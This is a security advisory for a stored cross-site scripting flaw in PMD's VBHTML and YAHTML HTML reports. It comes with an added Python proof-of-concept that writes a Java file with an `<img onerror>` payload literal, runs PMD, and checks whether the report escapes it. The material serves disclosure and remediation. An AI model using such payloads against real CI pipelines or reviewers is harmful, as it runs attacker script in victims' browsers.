net.sourceforge.pmd
cpe:2.3:a:pmd_project:pmd:*:*:*:*:*:*:*
- <= 7.21.0
A stored cross-site scripting vulnerability has been identified in PMD's VBHTML and YAHTML report formats prior to version 7.22.0. These renderers append rule violation messages directly into the HTML output without escaping them. Because some rule messages quote text taken from the analyzed source (for example, a duplicated string literal), running PMD against untrusted code that contains crafted string literals produces an HTML report carrying attacker-controlled markup, including JavaScript that executes when the report is opened in a browser. The default HTML format is not affected by this path, but it has a related defect: suppressed violation messages are also rendered without escaping, so unescaped content can reach the report there as well.
Exploitation yields stored cross-site scripting: the payload persists in the generated report file, and the injected JavaScript runs in the browser context of whoever opens that file, such as a developer or reviewer viewing a report that a CI job produced over contributed or third-party code. No interaction beyond opening the report in a browser is required.
To reproduce this vulnerability, create a Java file that repeats a string literal containing an HTML payload, such as an `<img>` tag with an `onerror` handler, often enough to trigger a duplicate-literal rule (AvoidDuplicateLiterals flags a literal at four occurrences by default). Run PMD with that rule and the `vbhtml` (or `yahtml`) format on the file. Opening the resulting report in a browser fires the handler and shows a JavaScript alert, demonstrating the cross-site scripting vulnerability.
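The reproduction above, as an added example that is not part of the advisory or of PMD's code base. It generates the PoC source file, shows the PMD command line, models the unescaped append beside its escaped counterpart, and gives a check for whether a generated report still carries the raw payload. Assumptions not stated on this page: the rule that echoes the literal is `category/java/errorprone.xml/AvoidDuplicateLiterals`, its message quotes the literal in the shape shown in `duplicate_literal_message`, and the PMD 7 CLI syntax is `pmd check -d DIR -R RULE -f FORMAT`. The `render_row_*` functions illustrate the defect and its fix; they are not PMD's renderer code.

```python
"""PoC generator and report check for the PMD VBHTML/YAHTML report XSS.

Added example, not PMD's own code. Assumed (not stated in the advisory):
  - the echoing rule is category/java/errorprone.xml/AvoidDuplicateLiterals,
    which flags a literal at 4 occurrences and quotes it in its message;
  - the PMD 7 CLI invocation is `pmd check -d DIR -R RULE -f FORMAT`.
The render_row_* functions model the renderer defect and its fix only.
"""
import html
import shutil
import subprocess
import tempfile
from pathlib import Path
from typing import List, Optional

RULE = "category/java/errorprone.xml/AvoidDuplicateLiterals"

# Constructed payload: the image never loads, so onerror fires with no user
# interaction beyond opening the report in a browser.
PAYLOAD = "<img src=x onerror=alert(document.domain)>"


def poc_java_source(payload: str = PAYLOAD, repeats: int = 5) -> str:
    """Java source repeating `payload` as a string literal `repeats` times."""
    # Only backslash and double quote need escaping inside a Java literal;
    # '<', '>' and '=' pass through untouched, which is what the report inherits.
    lit = payload.replace("\\", "\\\\").replace('"', '\\"')
    fields = "\n".join(f'    String s{i} = "{lit}";' for i in range(repeats))
    return f"public class Poc {{\n{fields}\n}}\n"


def duplicate_literal_message(literal: str, count: int, first_line: int) -> str:
    """Assumed shape of the AvoidDuplicateLiterals message, quoting the literal."""
    return (f'The String literal "{literal}" appears {count} times in this file; '
            f"the first occurrence is on line {first_line}")


def render_row_unescaped(message: str) -> str:
    """Models the defect: the message is appended to the markup verbatim."""
    return f"<tr><td>{message}</td></tr>"


def render_row_escaped(message: str) -> str:
    """The fix: escape every dynamic value before it reaches the markup."""
    return f"<tr><td>{html.escape(message, quote=True)}</td></tr>"


def report_has_raw_payload(report_html: str, payload: str = PAYLOAD) -> bool:
    """True when the payload survives unescaped, i.e. the report is exploitable."""
    return payload in report_html


def pmd_command(src_dir: str, fmt: str = "vbhtml") -> List[str]:
    """CLI line for the reproduction (PMD 7 syntax, assumed)."""
    return ["pmd", "check", "-d", src_dir, "-R", RULE, "-f", fmt]


def run_reproduction(fmt: str = "vbhtml") -> Optional[str]:
    """Write the PoC into a temp dir and run PMD if it is on PATH.
    Returns the report text (PMD writes it to stdout when no -r is given),
    or None when pmd is not installed."""
    if shutil.which("pmd") is None:
        return None
    with tempfile.TemporaryDirectory() as d:
        Path(d, "Poc.java").write_text(poc_java_source())
        # PMD exits non-zero when violations are found, so no check=True here.
        proc = subprocess.run(pmd_command(d, fmt), capture_output=True, text=True)
        return proc.stdout


if __name__ == "__main__":
    msg = duplicate_literal_message(PAYLOAD, 5, 2)
    print("vulnerable:", render_row_unescaped(msg))
    print("hardened:  ", render_row_escaped(msg))
    report = run_reproduction()
    if report is None:
        print("pmd not on PATH; run:", " ".join(pmd_command("<dir-with-Poc.java>")))
    else:
        print("report carries raw payload:", report_has_raw_payload(report))
```

Running the script with PMD on PATH prints whether the `vbhtml` report still contains the raw `<img ... onerror=...>` string; pass `yahtml` to `run_reproduction` to check the second affected format, and a fixed PMD (7.22.0 or later) should report `False`.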
Users are advised to upgrade to PMD version 7.22.0 or later, where this vulnerability has been fixed. Until the upgrade is in place, reports over untrusted code should be generated in a non-HTML format (such as `xml`, `json`, `sarif` or `text`), and existing VBHTML or YAHTML reports produced from untrusted sources should be treated as untrusted content rather than opened in a browser.